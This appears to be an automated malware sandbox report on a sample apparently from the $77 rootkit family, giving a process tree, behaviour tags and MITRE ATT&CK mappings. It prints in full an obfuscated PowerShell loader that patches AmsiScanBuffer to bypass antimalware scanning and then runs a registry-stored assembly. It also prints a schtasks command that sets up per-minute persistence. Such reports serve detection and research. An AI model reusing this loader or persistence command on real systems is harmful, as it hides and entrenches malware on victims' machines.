PID 620 wrote to memory of 1572	620	winlogon.exe	27
PID 620 wrote to memory of 1596	620	winlogon.exe	28
PID 620 wrote to memory of 1700	620	winlogon.exe	29
PID 620 wrote to memory of 1780	620	winlogon.exe	30
PID 620 wrote to memory of 1808	620	winlogon.exe	31
PID 620 wrote to memory of 2020	620	winlogon.exe	32
PID 620 wrote to memory of 2028	620	winlogon.exe	33
PID 620 wrote to memory of 2044	620	winlogon.exe	34
PID 620 wrote to memory of 1968	620	winlogon.exe	35
PID 620 wrote to memory of 1404	620	winlogon.exe	36
PID 620 wrote to memory of 2132	620	winlogon.exe	37
PID 620 wrote to memory of 2140	620	winlogon.exe	38
PID 620 wrote to memory of 2248	620	winlogon.exe	39
PID 620 wrote to memory of 2424	620	winlogon.exe	41
PID 620 wrote to memory of 2444	620	winlogon.exe	42
PID 620 wrote to memory of 2668	620	winlogon.exe	43
PID 620 wrote to memory of 2696	620	winlogon.exe	44
PID 620 wrote to memory of 2812	620	winlogon.exe	45
PID 620 wrote to memory of 2828	620	winlogon.exe	46
PID 620 wrote to memory of 2920	620	winlogon.exe	47
PID 620 wrote to memory of 2944	620	winlogon.exe	48
PID 620 wrote to memory of 2960	620	winlogon.exe	49
PID 620 wrote to memory of 2984	620	winlogon.exe	50
PID 620 wrote to memory of 3004	620	winlogon.exe	51
PID 620 wrote to memory of 3036	620	winlogon.exe	52
PID 620 wrote to memory of 3044	620	winlogon.exe	53
PID 620 wrote to memory of 3280	620	winlogon.exe	54
PID 620 wrote to memory of 3604	620	winlogon.exe	56
PID 620 wrote to memory of 3612	620	winlogon.exe	57
PID 620 wrote to memory of 3840	620	winlogon.exe	58
PID 620 wrote to memory of 688	620	winlogon.exe	60
PID 620 wrote to memory of 4204	620	winlogon.exe	62
PID 620 wrote to memory of 4424	620	winlogon.exe	63
PID 620 wrote to memory of 3648	620	winlogon.exe	66
PID 620 wrote to memory of 2736	620	winlogon.exe	67
PID 620 wrote to memory of 1624	620	winlogon.exe	68
PID 620 wrote to memory of 940	620	winlogon.exe	69
PID 620 wrote to memory of 3392	620	winlogon.exe	70
PID 620 wrote to memory of 3424	620	winlogon.exe	71
PID 620 wrote to memory of 3660	620	winlogon.exe	72
PID 620 wrote to memory of 2928	620	winlogon.exe	73
PID 620 wrote to memory of 3780	620	winlogon.exe	74
PID 620 wrote to memory of 4984	620	winlogon.exe	75

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1056

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1268
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:drsLNltgIyjN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nUyjAZyNMSIvML,[Parameter(Position=1)][Type]$VFmcFyQlEM)$ZCHqQCImkLT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+'D'+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+[Char](109)+'ory'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'Ty'+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'Seal'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'la'+'s'+'s',[MulticastDelegate]);$ZCHqQCImkLT.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+'e'+'c'+[Char](105)+''+'a'+''+'l'+'N'+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+'deBy'+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$nUyjAZyNMSIvML).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+'n'+'a'+'g'+'ed');$ZCHqQCImkLT.DefineMethod(''+'I'+''+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+'ir'+[Char](116)+''+'u'+''+'a'+'l',$VFmcFyQlEM,$nUyjAZyNMSIvML).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me,'+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $ZCHqQCImkLT.CreateType();}$ApEfeZRxEzclg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$KVzFSEmBZpuQWV=$ApEfeZRxEzclg.GetMethod(''+[Char](71)+'et'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'ic'+','+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OAjYnwOAJTuuOxoIoNH=drsLNltgIyjN @([String])([IntPtr]);$rLLXssqrEPIFvJajDjaGkK=drsLNltgIyjN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vKrfHxbyYNX=$ApEfeZRxEzclg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'odu'+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$FaKDMipRKJFQNf=$KVzFSEmBZpuQWV.Invoke($Null,@([Object]$vKrfHxbyYNX,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+'ib'+[Char](114)+''+[Char](97)+''+[Char](114)+'y'+'A'+'')));$CMSqfoDroUfzkMVAr=$KVzFSEmBZpuQWV.Invoke($Null,@([Object]$vKrfHxbyYNX,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+'P'+'r'+[Char](111)+'t'+[Char](101)+''+'c'+''+'t'+'')));$RikRora=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FaKDMipRKJFQNf,$OAjYnwOAJTuuOxoIoNH).Invoke(''+'a'+'ms'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$DPCnGBfyZttfNGERw=$KVzFSEmBZpuQWV.Invoke($Null,@([Object]$RikRora,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+'e'+''+[Char](114)+'')));$OZvChSHpip=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CMSqfoDroUfzkMVAr,$rLLXssqrEPIFvJajDjaGkK).Invoke($DPCnGBfyZttfNGERw,[uint32]8,4,[ref]$OZvChSHpip);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](164-33),[Byte](90+145),[Byte](117-117),[Byte](76+108),[Byte](252-165),[Byte](253-253),[Byte](174-167),[Byte](99+29),[Byte](181-44),[Byte](130+80),[Byte](192+3),[Byte](2+129),[Byte](244-51),[Byte](251-251)),0,$DPCnGBfyZttfNGERw,55-41);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CMSqfoDroUfzkMVAr,$rLLXssqrEPIFvJajDjaGkK).Invoke($DPCnGBfyZttfNGERw,[uint32]8,0x20,[ref]$OZvChSHpip);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+'t'+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3444
- C:\Users\Public\$77Client.exe
  "C:\Users\Public\$77Client.exe"
  2⤵
  - Executes dropped EXE
  PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1540
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2140

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2960

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3044

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3280

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3604
- C:\Users\Admin\AppData\Local\Temp\$77Test.exe
  "C:\Users\Admin\AppData\Local\Temp\$77Test.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Users\Public\$77Client.exe
    "C:\Users\Public\$77Client.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:2780
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Client" /tr "C:\Users\Public\$77Client.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3344
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3836
- - C:\Users\Public\$77Installer.exe
    "C:\Users\Public\$77Installer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2692
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3840

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:688

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4204

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1624

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:940

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3660

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2928

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:3780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4984

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3056

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 529fc7517768e1eb7592277251fe67fc gOC82kUUcUuh4IjZeADP9Q.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:3640
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2100

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3144

C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
1⤵
PID:4940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4744

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery